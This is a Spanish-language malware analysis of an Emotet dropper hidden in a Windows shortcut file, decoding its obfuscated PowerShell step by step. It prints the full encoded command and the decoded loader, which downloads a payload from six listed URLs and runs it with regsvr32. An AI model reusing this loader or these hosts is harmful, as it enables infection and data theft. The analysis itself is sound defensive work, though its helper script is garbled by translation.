Por Alexandre Siviero - Emotet es un troyano que se propaga principalmente a través de correos electrónicos fraudulentos (malspam). La infección puede llegar a través de scripts maliciosos, archivos de documentos con macros o enlaces maliciosos. Los correos electrónicos de Emotet pueden contener promociones familiares diseñadas de tal forma que parezcan un correo legítimo.
Fue posible obtener una muestra de Emotet a través de la página web de Triage.
El objetivo de este informe no es explicar en detalle cómo funciona Emotet, sino una forma de identificar y decodificar la versión más reciente del payload que lo difunde. Sin embargo, proporcionaremos a lo largo del mismo, nombres de funciones y módulos involucrados en esta creación, junto con referencias que el lector podrá consultar si desea profundizar en el tema.
Orden de desfusión
A continuación se muestra la muestra extraída de Triage.
A diferencia de campañas anteriores que propagaban esta familia de malware, no se trata de un documento de Office con macros maliciosas. La campaña actual utiliza archivos de acceso directo de Windows (extensión .lnk), como en el ejemplo anterior.
Para empezar el análisis, inspeccionamos las propiedades del atajo en cuestión:
En el campo de destino notamos algo inusual para archivos de esta naturaleza, la presencia de un comando Powershell para decodificar cadenas en base64. Por desgracia, el contenido de este objetivo de acceso directo es demasiado largo para la ventana de propiedades del archivo.
Para evitar esto utilizamos la herramienta HxD, que permite ver el contenido de cualquier archivo en hexadecimal. En la siguiente imagen es posible observar parte de la cadena codificada en base64.
Como es humanamente imposible entender este tipo de cadena, con la ayuda de la herramienta cyberchef, fue posible decodificar la Cadena, encontrando el siguiente código:
Tras la traducción, es posible observar parte del código contenido en el archivo. Se observa la ruta \Windows\system32\cmd.exe, seguida de una invocación powershell (ofuscada como p.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l...e.^.x.^.e) y la cadena base64.
c.m.d....e.x.e.............\......W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d....e.x. e.i./.v.:.o.n. ./.c.
.D.u.X.P.q.w.j.y.n.h.P.K.5.p.0.T.Y.c.a.C.f.4.G.k.A.t.B.W.l.J.m.P.l.w.q.d.5.q.s.n
.f.H.o.5.m.V.y.k.N.t.c.g.e.W.N.2.k.Q.L.m.a.c.K.q.V.A.R.F.E.g.F.V.|.|.g.o.t.o.&.p
.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.^.e. .-.c. .".&.{. .i.e.x..
.(...s.t.r.i.n.g....S.y.s.t.e.m...T.e.x.t...E.n.c.o.d.i.n.g.]:.:.A.S.C.I.I...G
.e.t.S.t.r.i.n.g.(.[.S.y.s.t.e.m...C.o.n.v.e.r.t.]:.:.F.r.o.m.B.a.s.e.6.4.S.t.r
.i.n.g.(.'.J.F.B.y.b.2.d.y.Z.X.N.z.U.H.J.l.Z.m.V.y.Z.W.5.j.Z.T.0.i.U.2.l.s.Z.W.5
.0.b.H.l.D.b.2.5.0.a.W.5.1.Z.S.I.7.J.G.x.p.b.m.t.z.P.S.g.i.a.H.R.0.c.D.o.v.L.2.h
.v.M.j.g.w.M.z.E.5.M.D.A.x.L.m.h.v.Z.2.l.i.b.y.5.u.Z.X.Q.v.a.W.5.j.b.H.V.k.Z.S.9
.0.Z.1.F.3.e.G.l.j.N.F.F.3.d.U.0.v.I.i.w.i.a.H.R.0.c.D.o.v.L.3.d.3.d.y.5.n.Z.X.J
.v.b.n.R.v.Z.2.V.y.a.W.F.0.c.m.l.h.L.m.9.y.Z.y.9.0.b.X.A.v.Y.0.I.2.Y.2.d.U.V.m.Z
.5.e.V.o.z.Y.j.F.3.O.W.Q.v.I.i.w.i.a.H.R.0.c.D.o.v.L.2.N.s.d.W.J.t.Y.W.5.h.Z.2.V
.y.L.m.5.l.d.C.5.h.c.i.9.w.c.n.V.l.Y.m.E.v.V.k.5.x.c.3.g.z.N.j.h.G.S.H.F.L.S.y.8
.i.L.C.J.o.d.H.R.w.O.i.8.v.b.X.l.t.a.W.N.y.b.2.d.y.Z.W.V.u.L.m.1.p.Z.2.h.0.Y.2.9
.k.Z.S.5.j.b.2.0.v.R.m.9.4.L.U.M.v.b.m.h.N.W.X.d.r.R.l.h.C.L.y.I.s.I.m.h.0.d.H.A
.6.L.y.9.0.b.3.d.h.c.m.R.z.d.W.4.u.b.m.V.0.L.2.F.k.b.W.l.u.L.z.h.O.V.z.J.U.S.m.V
.Q.c.z.h.k.W.m.h.i.L.y.I.s.I.m.h.0.d.H.A.6.L.y.9.o.a.3.d.p.b.m.R.z.Y.W.N.h.Z.G.V
.t.e.S.5.z.e.W.5.v.b.G.9.n.e.S.5.t.Z.S.9.A.Z.W.F.E.a.X.I.v.c.U.g.y.R.U.h.1.d.l.l
.W.b.0.p.F.S.j.I.v.I.i.k.7.Z.m.9.y.Z.W.F.j.a.C.A.o.J.H.U.g.a.W.4.g.J.G.x.p.b.m.t
.z.K.S.B.7.d.H.J.5.I.H.t.J.V.1.I.g.J.H.U.g.L.U.9.1.d.E.Z.p.b.G.U.g.J.G.V.u.d.j.p
.U.R.U.1.Q.L.0.R.3.R.V.h.y.Y.2.d.O.W.G.o.u.U.X.l.V.O.1.J.l.Z.3.N.2.c.j.M.y.L.m.V
.4.Z.S.A.k.Z.W.5.2.O.l.R.F.T.V.A.v.R.H.d.F.W.H.J.j.Z.0.5.Y.a.i.5.R.e.V.U.7.Y.n.J
.l.Y.W.t.9.I.G.N.h.d.G.N.o.I.H.s.g.f.X.0.=.').). .}.
Al intentar traducir base64, observamos que los puntos entre caracteres son una característica de almacenamiento de cadenas en UTF16-LE (cada carácter está separado por un byte nulo, que se traduce como "."). Para facilitar la lectura, utilizamos un sencillo script de python para eliminar los puntos innecesarios:
cadena = [UNICODE STRING]
unistring = ""
para i en rango(0, (len(cadena)-1)): si i == 0:
unistring += cadena[i] i+=1
si cadena[i-1] == ".":
si cadena[i-2] == "." y cadena[i] == ".": pass
si no:
unistring += cadena[i] i+=1
print(unistring)
El resultado es el siguiente:
" C:/v:on /c DuXPqwjynhPK5p0TYcaCf4GkAtBWlJmPlwqd5qsnfHo5mVykNtcgeWN2kQLmacKqVARFEgFV|goto&p
^o^w^e^r^s^h^e^l^l.e^x^e -c “&{ iex ([string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64Str ing(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2h vMjgwMzE5MDAxLmhvZ2liby5uZXQvaW5jbHVkZS90Z1F3eGljNFF3dU0vIiwiaHR0cDovL3d3dy5nZXJ vbnRvZ2VyaWF0cmlhLm9yZy90bXAvY0I2Y2dUVmZ5eVozYjF3OWQvIiwiaHR0cDovL2NsdWJtYW5hZ2V yLm5ldC5hci9wcnVlYmEvVk5xc3gzNjhGSHFLSy8iLCJodHRwOi8vbXltaWNyb2dyZWVuLm1pZ2h0Y29 kZS5jb20vRm94LUMvbmhNWXdrRlhCLyIsImh0dHA6Ly90b3dhcmRzdW4ubmV0L2FkbWluLzhOVzJUSmV QczhkWmhiLyIsImh0dHA6Ly9oa3dpbmRzYWNhZGVteS5zeW5vbG9neS5tZS9AZWFEaXIvcUgyRUh1dll Wb0pFSjIvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjp URU1QL0R3RVhyY2dOWGouUXlVO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvRHdFWHJjZ05Yai5ReVU7YnJ lYWt9IGNhdGNoIHsgfX0=’))) }”
Con la ayuda de la herramienta cyberchef es posible descifrar la cadena anterior. Por fin podemos leer claramente las intenciones del atacante:
$ProgressPreference="ContinuarSilenciosamente";
$links=(“http://ho280319001.hogibo.net/include/tgQwxic4QwuM/“, “http://www.gerontogeriatria.org/tmp/cB6cgTVfyyZ3b1w9d/“, “http://clubmanager.net.ar/prueba/VNqsx368FHqKK/“, “http://mymicrogreen.mightcode.com/Fox-C/nhMYwkFXB/“, “http://towardsun.net/admin/8NW2TJePs8dZhb/“, “http://hkwindsacademy.synology.me/@eaDir/qH2EHuvYVoJEJ2/“); for each ($u in $links) {
intentar {
IWR $u -OutFile $env:TEMP/DwEXrcgNXj.QyU; Regsvr32.exe $env:TEMP/DwEXrcgNXj.QyU;break
}
catch { }
}
El código anterior tiene seis direcciones URL, contenidas en una variable llamada enlaces. El bucle intenta acceder a una de estas direcciones, descargar su contenido a la carpeta temporal (env:TEMP/DwEXrcgNXj.QyU) y ejecutarlo a través de la aplicación regsvr32.exe (utilizada para la ejecución de DLL). Si este intento tiene éxito, se termina el bucle . La idea detrás de este código es proporcionar fuentes alternativas para la carga útil final. Si alguna de las direcciones no está disponible, el algoritmo intenta el mismo procedimiento para la siguiente de la lista.
Recomendaciones
Todos somos objetivos de Emotet. Hasta la fecha, Emotet ha atacado a particulares, empresas y entidades gubernamentales de todo el mundo, robando inicios de sesión bancarios, datos financieros e incluso monederos de bitcoins.
Cabe destacar un ataque de Emotet a la ciudad de Allentown, Pensilvania, que requirió la asistencia directa del equipo de respuesta a incidentes de Microsoft para su limpieza y supuso un coste de reparación de más de un millón de dólares para la ciudad.
Ahora que Emotet se está utilizando para descargar y propagar otros troyanos bancarios, la lista de objetivos podría ser aún más amplia. Las primeras versiones de Emotet se utilizaron para atacar a clientes bancarios en Alemania. Versiones posteriores de Emotet se dirigieron a organizaciones de Canadá, Reino Unido y Estados Unidos. Las campañas vistas en 2022, por su parte, tienen un enfoque mundial, un ejemplo en el que el asunto era "buona pasqua, feliz pascua", pero adjunto al correo electrónico había un archivo XLS malicioso para propagar e "instalar" Emotet.
Referencias
- https://pt.malwarebytes.com/emotet/
- https://www.checkpoint.com/press/2022/february-2022s-most-wanted-malware-emotet-remains- number-one-while-trickbot-slips-even-further-down-the-index/
- https://www.youtube.com/watch?v=-W4yZifokx0
- https://canaltech.com.br/seguranca/governo-do-japao-lanca-ferramenta-que-detecta-nova-versao- do-malware-emotet-215176/